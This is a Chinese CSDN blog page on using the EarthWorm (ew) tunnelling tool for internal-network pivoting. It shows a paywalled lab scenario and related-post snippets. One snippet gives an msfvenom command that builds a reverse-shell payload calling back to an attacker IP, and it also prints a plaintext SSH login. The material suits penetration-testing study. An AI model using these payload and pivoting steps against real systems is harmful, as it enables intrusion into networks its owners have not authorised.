ew的使用

最新推荐文章于 2024-01-14 14:37:17 发布
最新推荐文章于 2024-01-14 14:37:17 发布
阅读量463 收藏
点赞数
分类专栏: 网络安全工具使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/115388929
版权

目录

0x01 需求

0x02 场景

2、前提描述

0x03 操作

0x04 总结

0x01 需求

 

当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如:

 

  • 端口扫描
  •  
  • 端口转发
  •  
  • 访问内网web服务
  •  
  • ……

 

0x02 场景

 

以下模拟一个使用场景。

 

1、环境配置、网络拓扑

 

  • A1 - 120.x.x.x - Kali - 公网攻击服务器
  •  
  • V1 - 10.10.1.111 - Centos - 内网服务器,对公网开放但无公网IP,80端口存在web应用,通过一台nginx对公网开放,现已获得webshell,路由可抵达10.10.1段。
  •  
  • V2 - 10.10.2.111 - Centos - 内网服务器,不对公网开放,路由可抵达10.10.1和10.10.3段。
  •  
  • V3 - 10.10.3.111 - Centos - 内网服务器,不对公网开放,8080端口存在web应用,10.10.2段路由可达,10.10.1段路由不可达。

 

 

 

2、前提描述

 

在一次渗透中,操作A1对V1上web应用进行渗透,获取了V1的webshell,并反弹shell到A1上。接下来打算做内网渗透,进一步发现内网资源。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
EW内网渗透
05-06
EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透 EW内网渗透
【内网学习笔记】10、ew使用
TeamsSix 的 CSDN 空间
06-10 6341
1、Socks 代理工具介绍 Socks 代理可以理解成升级版的 lcx,关于 lcx 的用法可以看我之前的文章: https://teamssix.com/year/210528-130449.html 但是 lcx 毕竟年代久远,现在的杀软基本也都能识别到了,因此在实战中不太推荐使用 lcx ,更推荐使用这些 socks 代理工具。 常见的 socks 代理工具有 ew、termite、frp、nps、sSocks、reGeorg、Neo-reGeorg、SocksCap、Proxifier、Proxy
内网转发工具EW使用
Bird&Bird
12-22 3653
目录EW(EarthWorm)结合proxychains代理链EW正向代理EW反向代理 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用,跨平台,任何平台都可以轻松使用EW(
EW代理工具的使用说明
Ays.Ie的博客
05-18 1706
本篇介绍了ew代理转发工具,以及简单的应用
EW使用
cxk
07-02 8732
EW使用 靶机 win7 192.168.5.101 攻击机 win 10 192.168.0.31 攻击机 kali 192.168.5.102 1)ew 自身的各个选项用途说明 -l 指定要监听的本地端口 -d 指定要反弹到的机器 ip -e 指定要反弹到的机器端口 -f 指定要主动连接的机器 ip -g 指定要主动连接的机器端口 -t 指定超时时长,默认为 1000 2)执行正向转发 在k...
RF-20M/EW使用说明书
04-08
RF-20M/EW是一款嵌入式的IC模式门禁读卡器,主要适用于门禁控制系统,具有高效率和稳定性。这款设备支持两种频率模式,RF-20MW工作在13.56MHz,兼容M1卡类型,而RF-20EW则工作在125KHz,兼容EM卡。读卡范围在0到8...
ew
03-20
要开始使用此模板,请选择以下选项之一以开始使用: 通过npm安装: npm i startbootstrap-grayscale 克隆仓库: git clone https://github.com/BlackrockDigital/startbootstrap-grayscale.git 用法 基本用法 下载后...
UART.rar_EW430
09-21
/DM430-L型最小系统板串口测试程序,使用单片机的串口0 //通过电脑与串口线连接开发板串口座,使用串口调试助手发送数据到系统板 //系统板会将收到的数据再发送到串口调试助手,接收采用中断...调试环境:EW430 V5.30
ew750拆机图片.zip
11-02
【标题】"ew750拆机图片.zip"所代表的知识点主要集中在对聚网捷 EW750 这款...总之,"ew750拆机图片.zip"不仅提供了设备的视觉解剖图,还为使用者提供了实践操作的指南,有助于提升他们对硬件设备的理解和处理能力。
EwJs:用于在Web上构建UI的微型JavaScript框架。 (即将编码)
05-02
w 用于在Web上构建UI的微型JavaScript框架。 (即将编码) 获取元素 $("h1"); $.query("h1"); 获取所有元素作为数组 $.querys("li"); 获取HTML内容HTML值 $("h1").html(); ------------------- var h=$("h1"); alert ( h.html() ); 更改HTML内容 var h=$("h1"); h.html("New Value"); -------------------- h.html( h.html() + " ==> New Value");//like append 附加到HTML内容 var h=$("h1"); h.append("!!!!"); 动画:淡入淡出元素 $("h1").fadeout(); $("h1").fadeout(5000); $("h1").f
【内网—内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 4810
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 1770
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
渗透测试之反弹代理(ew的高级用法)反向代理
broing55的博客
03-18 3033
a
EW!一款便携式的网络穿透工具
qq_42777941的博客
12-21 1096
Earthworm(ew)是一款便携式的网络穿透工具,基于标准C开发,具有socks v5服务架设和端口转发两大核心功能,可用于复杂网络环境下的数据转发。该工具能通过“正向”,“反向”,“多级级联”等方式打通一条网络隧道。且工具包中提供了多种可执行文件,以适用于不同的操作系统(包括Linux、Windows、MacOS),使其更具有灵活性和通用性。
隧道应用4-内网穿透EW的简单使用
最新发布
Welcome To Myon'Blog !
01-14 738
使用另一台主机访问该主机的 8888 端口,该主机 IP 为192.168.249.1。lcx_slave/lcx_listen/lcx_tran + 端口转发参数。则会直接跳转到 192.168.249.129 的dvwa靶场服务。通过跳板机配置的端口转发进而访问到内网其他主机的服务。与netsh端口映射内网类似,也是通过跳板机实现。装好工具EW,这里以Windows版本做演示。停掉 ew ,再次访问,则无法加载页面。以上就是关于 ew 的一个简单用法。在 cmd 里面执行如下命令。
内网穿透工具EW的简单使用(附内网环境实现)
markecheng的博客
12-15 7615
前言 EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透 EW可以已正向和方向以及多级级联的方式建立网络隧道 这里示范简单的正向以及反向是实现过程 实现环境 目标,使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接 过程 1.在EW工具包中,有很多版本,linux有32位的,以及64位的,首先我们需要输入以下命令来查看我们需要运行多少位的ew工具
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 2706
1.远程连接: ssh yansiyu@10.177.228.176 W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
mybatisplus ew
06-08
Mybatis-Plus中的EW是一个强大的查询条件构造器,可以帮助开发者快速构建复杂的查询条件。EW的主要特点包括: 1. 类似于SQL的语法:EW的语法类似于SQL语句,易于理解和使用。 2. 支持多种查询条件:EW支持等于、不等于、大于、小于、模糊查询、in查询、between查询等多种查询条件,可以满足不同的查询需求。 3. 支持多表关联查询:EW支持多表关联查询,可以通过Wrapper对象的setSqlSelect方法指定需要查询的字段。 4. 支持Lambda表达式:EW还支持Lambda表达式,可以使用Java8中的Lambda语法来构建查询条件,使得代码更加简洁。 使用EW的步骤如下: 1. 创建一个Wrapper对象。 2. 使用Wrapper对象的方法构建查询条件。 3. 调用BaseMapper的select方法进行查询。 例如,下面的代码演示了如何使用EW进行查询: ```java Wrapper<User> wrapper = new QueryWrapper<User>() .eq("name", "张三") .eq("age", 18); List<User> userList = userMapper.selectList(wrapper); ``` 这段代码使用QueryWrapper构建了一个查询条件,查询名字为“张三”且年龄为18岁的用户信息。最后使用userMapper的selectList方法进行查询,并返回查询结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值